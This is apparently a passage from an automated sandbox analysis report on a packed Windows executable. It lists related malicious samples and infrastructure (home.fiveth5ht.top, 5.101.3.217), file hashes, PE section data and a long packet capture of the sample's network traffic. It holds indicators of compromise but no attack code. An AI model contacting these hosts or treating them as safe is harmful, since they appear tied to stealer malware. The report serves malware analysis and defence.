                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        home.fiveth5ht.topdZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        httpbin.orgQzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155
                                                        ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155
                                                        BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        PINDC-ASRUdZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                        • 5.101.3.217
                                                        OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        AMAZON-AESUSQzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155
                                                        ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155
                                                        BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                        • 34.226.108.155
                                                        db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                        • 34.195.210.183
                                                        OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        No created / dropped files found

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                        Entropy (8bit):7.984618823919531
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • VXD Driver (31/22) 0.00%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:5KwhHEdmM4.exe
                                                        File size:4'488'704 bytes
                                                        MD5:0c9fc2b51c7c604fd0bd9789f344cb95
                                                        SHA1:c9dcd9ec34f73e7d109605f5b092e7f16be55bd7
                                                        SHA256:5215a50e992b411a73a9cb9dee51b39ce8b7505de7995bcba240e6f809b3696b
                                                        SHA512:264670682c48ce6ab59f62187f31b7afff4832c1ec0115b83864e6df8318b8c818c49ed14a54ef9c13abe30bc522ac6eba76ece5cb9a455ec8c47a64d22d2885
                                                        SSDEEP:98304:dGz4NC30FzVzO37pp8vTUm66oGy7IvqGc8RZD5ieCXTQuGbov:dGz4Ny0FVzACTUm6LG6Ivp9ZIXcjo
                                                        TLSH:69263354DDA530A8D6E45172F139511BFE928D31CEAF2A32CD6E3B5ECAF250FB1021A1
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2... ....... I...@..........................P.......3E...@... ............................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x1032000
                                                        Entrypoint Section:.taggant
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                        DLL Characteristics:DYNAMIC_BASE
                                                        Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                        Authenticode Signature

                                                        Signature Valid:
                                                        Signature Issuer:
                                                        Signature Validation Error:
                                                        Error Number:
                                                        Not Before, Not After
                                                          Subject Chain
                                                            Version:
                                                            Thumbprint MD5:
                                                            Thumbprint SHA-1:
                                                            Thumbprint SHA-256:
                                                            Serial:

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp 00007F10C4CF4B8Ah
                                                            subps xmm0, dqword ptr [eax+eax+00h]
                                                            add byte ptr [eax], al
                                                            add cl, ch
                                                            add byte ptr [eax], ah
                                                            add byte ptr [eax], al
                                                            add byte ptr [edi], al
                                                            or al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add bh, bh

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc305900x10dmqztadf
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0xc305400x18dmqztadf
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            0x10000x6db0000x288a0014a13668632ee8df7a186a629b18b2cbunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x6dc0000x1ac0x2000740829dfdbec4c7e3c4ea75a52a588aFalse0.580078125data4.556299681886651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            0x6de0000x3970000x200302aed0bda07d9b350a9f8d1f38fd70cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            dmqztadf0xa750000x1bc0000x1bb800635fb0382f0b9e2b2812fb71d1a4b746False0.994349809751973data7.955259097933418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            eghuolxt0xc310000x10000x4008c1a54dd0b46fbdea313703b0bc267d7False0.818359375data6.344694180445355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .taggant0xc320000x30000x2200d25fb50028601d246281562c206bd66eFalse0.05859375DOS executable (COM)0.7096670996240843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0xc305a00x152ASCII text, with CRLF line terminators0.6479289940828402

                                                            Imports

                                                            DLLImport
                                                            kernel32.dlllstrcpy

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 27, 2024 15:05:50.997571945 CET49700443192.168.2.734.226.108.155
                                                            Dec 27, 2024 15:05:50.997617960 CET4434970034.226.108.155192.168.2.7
                                                            Dec 27, 2024 15:05:50.997679949 CET49700443192.168.2.734.226.108.155
                                                            Dec 27, 2024 15:05:51.016897917 CET49700443192.168.2.734.226.108.155
                                                            Dec 27, 2024 15:05:51.016937971 CET4434970034.226.108.155192.168.2.7
                                                            Dec 27, 2024 15:05:52.866133928 CET4434970034.226.108.155192.168.2.7
                                                            Dec 27, 2024 15:05:52.868810892 CET49700443192.168.2.734.226.108.155
                                                            Dec 27, 2024 15:05:52.868838072 CET4434970034.226.108.155192.168.2.7
                                                            Dec 27, 2024 15:05:52.870300055 CET4434970034.226.108.155192.168.2.7
                                                            Dec 27, 2024 15:05:52.870351076 CET49700443192.168.2.734.226.108.155
                                                            Dec 27, 2024 15:05:52.888250113 CET49700443192.168.2.734.226.108.155
                                                            Dec 27, 2024 15:05:52.888398886 CET4434970034.226.108.155192.168.2.7
                                                            Dec 27, 2024 15:05:52.891978979 CET49700443192.168.2.734.226.108.155
                                                            Dec 27, 2024 15:05:52.892000914 CET4434970034.226.108.155192.168.2.7
                                                            Dec 27, 2024 15:05:52.946316957 CET49700443192.168.2.734.226.108.155
                                                            Dec 27, 2024 15:05:53.214333057 CET4434970034.226.108.155192.168.2.7
                                                            Dec 27, 2024 15:05:53.214616060 CET4434970034.226.108.155192.168.2.7
                                                            Dec 27, 2024 15:05:53.214708090 CET49700443192.168.2.734.226.108.155
                                                            Dec 27, 2024 15:05:53.227350950 CET49700443192.168.2.734.226.108.155
                                                            Dec 27, 2024 15:05:53.227380991 CET4434970034.226.108.155192.168.2.7
                                                            Dec 27, 2024 15:05:55.345576048 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.466133118 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.466351986 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.667896986 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.787566900 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.787584066 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.787642002 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.787642002 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.787651062 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.787709951 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.787713051 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.787730932 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.787775993 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.787786961 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.787796974 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.787808895 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.787820101 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.787846088 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.787925959 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.787935019 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.787957907 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.787980080 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.907320976 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.907339096 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.907370090 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.907380104 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.907398939 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.907474041 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.907483101 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.907511950 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.907686949 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.907747984 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:55.950527906 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:55.950658083 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.070311069 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.070413113 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.110686064 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.110760927 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.230446100 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.230556011 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.391844034 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.391956091 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.517741919 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.518284082 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.518515110 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.639525890 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.639616013 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.639651060 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.639661074 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.639669895 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.639678955 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.639763117 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.639810085 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.639818907 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.639899969 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.639950991 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.639960051 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.639993906 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640021086 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.640069008 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.640185118 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640194893 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640249014 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.640316963 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640326977 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640335083 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640343904 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640388012 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.640429020 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.640474081 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640484095 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640619040 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640629053 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640636921 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640786886 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640935898 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.640944958 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.641086102 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.641094923 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.641103029 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.641248941 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.641258001 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.641266108 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.641319036 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.641410112 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.641418934 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.641484022 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.682466984 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.682683945 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.759305954 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.759434938 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.759476900 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.759545088 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.759558916 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.759699106 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.759783983 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.759875059 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.759955883 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.760088921 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.760097980 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.760186911 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.760271072 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.760348082 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.760355949 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.760433912 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.760467052 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.760543108 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.760565042 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.760888100 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.760994911 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761010885 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761063099 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.761107922 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761123896 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761176109 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.761353970 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761363029 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761435986 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761440039 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.761492014 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761542082 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.761579037 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761590004 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761642933 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.761683941 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761699915 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761746883 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.761778116 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761786938 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761876106 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761914015 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.761970997 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762015104 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762109041 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762118101 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762214899 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762223959 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762269974 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762377024 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762386084 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762476921 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762485981 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762494087 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762568951 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762579918 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762710094 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762721062 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762814999 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762825012 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762907028 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762917995 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.762995958 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.763041019 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.763086081 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.763097048 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.763184071 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.763221979 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.763309002 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.763324976 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.763396025 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.763413906 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.802305937 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.879192114 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.879354954 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.879488945 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.879497051 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.879533052 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.879656076 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.879666090 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880326986 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.880460978 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.880506039 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880516052 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880551100 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880584002 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880739927 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880748987 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880861998 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880872011 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881150961 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881175995 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881364107 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881434917 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881565094 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881581068 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881630898 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881680965 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881736994 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881783009 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881875038 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881973982 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881983995 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882002115 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882133007 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882142067 CET80497015.101.3.217192.168.2.7
